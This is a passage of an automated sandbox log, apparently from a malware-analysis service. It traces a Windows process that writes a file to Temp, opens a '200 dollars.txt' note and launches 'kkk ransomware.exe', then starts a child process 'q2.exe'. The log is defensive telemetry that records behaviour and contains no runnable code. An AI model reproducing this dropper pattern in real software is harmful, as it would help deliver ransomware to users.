lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.135] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.136] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.137] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.137] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.137] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.137] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.137] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.137] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.138] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.139] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.139] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.139] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.139] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.139] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.140] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.141] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.141] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.141] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.141] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.141] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.141] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.142] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.142] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.142] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.142] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.142] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.143] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.143] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.143] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.143] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.143] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.143] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.144] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.145] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.145] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.146] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.146] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.146] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.146] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.146] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.146] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd7b8, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd7b8*=0x1000, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6fd818, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd818*=0x1000, lpOverlapped=0x0) returned 1 [0062.148] WriteFile (in: hFile=0x2fc, lpBuffer=0x2833b28*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x6fd848, lpOverlapped=0x0 | out: lpBuffer=0x2833b28*, lpNumberOfBytesWritten=0x6fd848*=0xd8, lpOverlapped=0x0) returned 1 [0062.148] CloseHandle (hObject=0x2fc) returned 1 [0062.284] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x8c1d00 [0062.285] RtlMoveMemory (in: Destination=0x8c1d00, Source=0x2834be0, Length=0x68 | out: Destination=0x8c1d00) [0062.292] ShellExecuteExW (in: pExecInfo=0x2834e28*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\200 dollars.txt", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2834e28*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\200 dollars.txt", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x5cc)) returned 1 [0062.385] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0068.255] LocalFree (hMem=0x8c1d00) returned 0x0 [0068.258] LocalAlloc (uFlags=0x0, uBytes=0x6e) returned 0x938790 [0068.258] RtlMoveMemory (in: Destination=0x938790, Source=0x2834ef0, Length=0x6e | out: Destination=0x938790) [0068.258] ShellExecuteExW (in: pExecInfo=0x2835100*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\kkk ransomware.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2835100*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\\\kkk ransomware.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x508)) returned 1 [0073.360] LocalFree (hMem=0x938790) returned 0x0 [0073.380] SendMessageW (hWnd=0x502ba, Msg=0x10, wParam=0x0, lParam=0x0) returned 0x0 [0073.632] DestroyCursor (hCursor=0x90231) returned 1 [0074.798] GetWindowLongPtrW (hWnd=0x502ba, nIndex=-20) returned 0x50100 [0074.799] DestroyWindow (hWnd=0x502ba) returned 1 [0074.799] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0074.807] PostThreadMessageW (idThread=0x25c, Msg=0x12, wParam=0x0, lParam=0x0) returned 1 [0074.810] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0074.811] CallWindowProcW (lpPrevWndFunc=0x7ffc38b05090, hWnd=0x502ba, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0074.820] CoGetContextToken (in: pToken=0x6fd750 | out: pToken=0x6fd750) returned 0x0 [0074.820] CObjectContext::QueryInterface () returned 0x0 [0074.820] CObjectContext::GetCurrentThreadType () returned 0x0 [0074.820] Release () returned 0x3 [0074.821] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x855ef0*=0x134, lpdwindex=0x6fd490 | out: lpdwindex=0x6fd490) returned 0x0 Thread: id = 26 os_tid = 0x4ec Thread: id = 31 os_tid = 0xebc Thread: id = 32 os_tid = 0xec0 [0055.427] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0074.889] SetWindowLongPtrW (hWnd=0x402c0, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x830a5c [0074.891] SetClassLongPtrW (hWnd=0x402c0, nIndex=-24, dwNewLong=0x7ffc38b05090) returned 0x830a0c [0074.891] PostMessageW (hWnd=0x402c0, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0074.892] GetModuleHandleW (lpModuleName=0x0) returned 0x2e0000 [0074.893] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.33c0d9d", hInstance=0x2e0000) returned 0 [0074.894] DeleteAtom (nAtom=0xc000) returned 0x0 [0074.894] FindAtomW (lpString="GDI+Atom_412_1") returned 0x0 [0074.894] IsWindow (hWnd=0x202cc) returned 1 [0074.895] GetModuleHandleW (lpModuleName="user32.dll") returned 0x7ffc38450000 [0074.896] CoTaskMemAlloc (cb=0x10) returned 0x93bd30 [0074.896] GetProcAddress (hModule=0x7ffc38450000, lpProcName="DefWindowProcW") returned 0x7ffc38b05090 [0074.896] CoTaskMemFree (pv=0x93bd30) [0074.897] SetWindowLongPtrW (hWnd=0x202cc, nIndex=-4, dwNewLong=0x7ffc38b05090) returned 0x83075c [0074.898] SetClassLongPtrW (hWnd=0x202cc, nIndex=-24, dwNewLong=0x7ffc38b05090) returned 0x83075c [0074.898] IsWindow (hWnd=0x202cc) returned 1 [0074.899] DestroyWindow (hWnd=0x202cc) returned 0 [0074.899] PostMessageW (hWnd=0x202cc, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0074.900] SetConsoleCtrlHandler (HandlerRoutine=0x830b3c, Add=0) returned 1 [0074.914] DeleteObject (ho=0x370a07a6) returned 1 [0074.916] FindAtomW (lpString="GDI+Atom_412_1") returned 0x0 [0074.916] DestroyCursor (hCursor=0x80137) returned 1 [0074.916] CloseHandle (hObject=0x2a4) returned 1 [0074.916] UnmapViewOfFile (lpBaseAddress=0x2420000) returned 1 [0074.917] CloseHandle (hObject=0x508) returned 1 [0074.917] CloseHandle (hObject=0x5cc) returned 1 [0074.918] CloseHandle (hObject=0x29c) returned 1 [0074.918] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 Thread: id = 39 os_tid = 0x11d4 Thread: id = 40 os_tid = 0x12c4 Thread: id = 41 os_tid = 0xe8c Thread: id = 42 os_tid = 0x131c Thread: id = 43 os_tid = 0x1324 Thread: id = 44 os_tid = 0x1334 Thread: id = 45 os_tid = 0x1378 Thread: id = 46 os_tid = 0x1308 Thread: id = 47 os_tid = 0x12e0 Thread: id = 48 os_tid = 0x12f0 Thread: id = 57 os_tid = 0x360 Process: id = "4" image_name = "q2.exe" filename = "c:\\users\\fd1hvy\\appdata\\local\\temp\\q2.exe" page_root = "0x166f0000" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13f8" cmd_line = "\"C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Q2.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 27 os_tid = 0x8cc [0060.895] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0060.981] RoInitialize () returned 0x1 [0060.981] RoUninitialize () returned 0x0 [0062.982] CoTaskMemAlloc (cb=0x20c) returned 0x99f930 [0062.982] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x99f930 | out: 